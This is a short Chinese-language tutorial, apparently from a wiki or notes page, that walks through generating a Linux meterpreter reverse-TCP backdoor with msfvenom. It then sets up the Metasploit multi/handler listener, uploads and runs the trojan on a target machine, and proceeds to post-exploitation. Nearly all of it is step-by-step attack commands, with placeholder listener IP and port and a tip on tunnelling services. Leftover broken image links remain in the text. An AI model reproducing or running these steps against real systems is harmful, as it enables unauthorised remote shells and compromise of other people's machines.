MSF-Metasploit Framework
一台靶机
生成一个Linux后门
msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST={监控IP} LPORT={监控端口} -f elf > shell.elf!.assets/1643108165465.png)
启动msf 终端内输入:msfconsole 启动msf
.assets/1643108186343.png)
载入监控模块 msf中输入: use exploit/multi/handler
加载payload msf终端中输入:set payload linux/x64/meterpreter/reverse_tcp
配置payload msf终端中输入:show options
配置payload监控IP msf终端中输入: set lhost {监控IP}
配置payload监控端口 msf终端中输入:set lport {监控端口} (注意这里要和木马配置时使用的端口相同&如果使用内网穿透服务填写转发后的端口)
检查payload配置 msf终端中输入:show options
执行监控 msf终端中输入: run
将木马上传到靶机
在靶机上执行木马
完成攻击利用
.assets/1643108263211.png)
于是即可进行后渗透
Last updated 11 months ago